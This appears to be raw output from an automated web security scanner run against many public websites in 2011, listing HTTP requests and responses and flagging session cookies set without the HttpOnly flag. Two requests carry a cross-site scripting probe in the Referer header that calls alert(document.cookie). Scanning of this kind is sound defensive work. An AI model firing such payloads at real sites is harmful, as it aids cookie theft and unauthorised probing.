HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:01:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Tue, 01 Feb 2011 19:01:42 GMT Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Tue, 01 Feb 2011 19:01:42 GMT Set-Cookie: _smasher_session=0884043c57a485ce4cbb73416ccb308f; domain=diigo.com; path=/ ETag: "152b87fdda438c461169e0c57ed9939c" P3P: CP="NOI DEVa TAIa OUR BUS UNI" X-Runtime: 0.00139 Content-Length: 9244 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.dooce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:01:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11 X-Powered-By: PHP/5.2.11 Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=71f18f11fd684daf83cd39428a8d9146; expires=Tue, 01-Mar-2011 19:35:09 GMT; path=/; domain=.dooce.com Last-Modified: Sun, 06 Feb 2011 16:01:49 GMT ETag: "0493be742911f37fbd142739098641b2" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10157
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.download32.com Proxy-Connection: keep-alive Referer: http://www.download32.com/new.html?e898c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebfecbfd1b5d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1697810850-1296942494788
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nslookup-software.html HTTP/1.1 Host: www.download32.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nslookup Software Do ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.ebooklibs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:03:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=960c78bbb1339e72b86aff1fa9dcfed2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28212
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="rob ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/s/Videos/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /files.php?name=Nslookup HTTP/1.1 Host: www.filetransit.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <head> <title>Nslookup Software - NSLookup, Atelier Web Security Port Scanner, DNS Thing ...</title> <meta http-equiv="Con ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.folkd.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxitsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.gabbr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.gpg.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:06:39 GMT Server: Apache Set-Cookie: SESS4f8b8e940bd1b5592aec2833218c244b=juq455no7avf4ohoeb33ho2n46; expires=Tue, 01-Mar-2011 01:39:59 GMT; path=/; domain=.gpg.org Last-Modified: Sat, 05 Feb 2011 22:06:39 GMT ETag: "92cf80f6e0d2cd5989936c5e23a89fff" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.hemidemi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:14 GMT Server: Mongrel 1.1.3 Status: 200 OK Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 3576 Set-Cookie: _session_id=66b150e6e745bd9b2dff53708f727cc0; path=/ Vary: Accept-Encoding Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.jamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /techdirect/ HTTP/1.1 Host: www.jazdtech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:01:52 GMT Set-Cookie: JazdSession="a60b5303-7988-48d1-88b3-467a83635a2c:1297008112717"; Version=1; Max-Age=3600; Expires=Sun, 06-Feb-2011 17:01:52 GMT; Path=/ Set-Cookie: JazdTestCookie=1297008112717; Expires=Mon, 06-Feb-2012 16:01:52 GMT; Path=/ Set-Cookie: JSESSIONID=90039B3D2C4BBD4CB6E1E02847F77216; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Content-Length: 74356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META name= ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /techdirect/content/download.htm?contentSetId=60049707&contentId=60056832&contentSetTypeId=10&pageTypeId=1 HTTP/1.1 Host: www.jazdtech.com Proxy-Connection: keep-alive Referer: http://www.jazdtech.com/techdirect/?decf1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E28f30fa12ca=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JazdSession="3b4eea85-b138-4e6f-b7b9-9e0d90c2cf6d:1297008537536"; JazdTestCookie=1297008537536; JSESSIONID=F90B4442ACCB72FBEA93BBB1A2A1DEC7
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.jumptags.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=b0m32fe8ia2aj602f1o1q5f1r7; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:02 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=b0m32fe8ia2aj602f1o1q5f1r7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax:6164122648378833163"; Version=1; Path=/ P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:ZTkdLLKZK_ggZRbY44T2FKTN6Eo_M0OV49kqXrkZrEol8AbriE_Vxr:1296946948:e68b5644f2e89cdd8b8600193a537cd5b3bca0ac"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 23:32:27 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 02:16:35 GMT; Path=/ Set-Cookie: bcookie="v=1&141e3dd9-2a20-4c3c-827f-21d17cd03532"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 02:16:35 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 23:02:28 GMT Content-Length: 19987
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /companies/222438/OwnerIQ HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZQgw03ZYfQ00azc_JSdCZKQJd4K6alIZMZdC0MUYURk89UEZXdolwx:1296946949:65fdca8a090beb3f900ea530a9bab4f648ed93f8"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 23:32:29 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:4713947493888160893"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: bcookie="v=1&e6f1aaac-08d7-4426-85cc-9b3490cae2cf"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 05 Feb 2011 23:02:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a42198c;expires=Sat, 05-Feb-2011 23:32:45 GMT;path=/;httponly Content-Length: 26660
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /groupInvitation HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:USPcjVjh_OtiRy9WPlG0jPNXb0WyphkShZD0e7Nn60hypyfO-0CmKk:1296943603:1f5c383a1a62947997acc0a50d1873ded2a84670"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 22:36:42 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:3497768082988792158"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 01:20:50 GMT; Path=/ Set-Cookie: bcookie="v=1&cd6dbf47-e6cf-4898-9bbd-b3e4bc5d6192"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 01:20:50 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 05 Feb 2011 22:06:42 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965b45525d5f4f58455e445a4a42198c;expires=Sat, 05-Feb-2011 22:36:58 GMT;path=/;httponly Content-Length: 12878
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=965ts4g3qv9nm1g1ubp8p7k021; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.lovely-faces.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 20:35:01 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, max-age=900, pre-check=900 Set-Cookie: PHPSESSID=965ts4g3qv9nm1g1ubp8p7k021; path=/ Last-Modified: Sat, 05 Feb 2011 09:23:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=U ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy.html HTTP/1.1 Host: www.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tc.html HTTP/1.1 Host: www.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z;
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=dri464g5lu2kq9c1sqpg1v3c16; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /directory/draw_list_prize_bond_draw_result_7500.html HTTP/1.1 Host: www.merapakistan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:07:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=dri464g5lu2kq9c1sqpg1v3c16; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 35028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.migrationexpertzone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mindbodygreen.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=2808EAD77051D7744363EB0876447148; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Sat, 05 Feb 2011 23:02:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
wongsess=e90cffbaa0823899fb24df43be3f65dd; expires=Wed, 06 Feb 2036 05:02:44 GMT; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mister-wong.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:44 GMT Server: Apache Set-Cookie: wongsess=e90cffbaa0823899fb24df43be3f65dd; expires=Wed, 06 Feb 2036 05:02:44 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 7516 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mylinkvault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:48 GMT Server: Apache X-Powered-By: PHP/5.2.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en Set-Cookie: PHPSESSID=os9t2670j382p7k3kipnt47et6; path=/; domain=.mylinkvault.com Vary: Accept-Encoding Content-Length: 12638 Connection: close Content-Type: text/html; charset=utf-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.netlog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=0000jQb9DKl__HTGjPUMmqXLC4O:-1; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.netvouz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:52 GMT Server: IBM_HTTP_Server P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR NOR UNI COM NAV" Set-Cookie: JSESSIONID=0000jQb9DKl__HTGjPUMmqXLC4O:-1; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 20206
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.oandp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:06:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 40048 Content-Type: text/html; Charset=windows-1252 Expires: Sat, 05 Feb 2011 22:05:38 GMT Set-Cookie: ASPSESSIONIDCQSQQCTS=MNHFLLNCGGABOKOGOBCCPICA; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml" Content-Type: text/html; charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 22:39:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b; Path=/ Set-Cookie: jsession_unique_id=1296945586525; Expires=Sun, 06 Feb 2011 00:09:46 GMT; Path=/ Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/ Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/ Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com Content-Length: 87491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
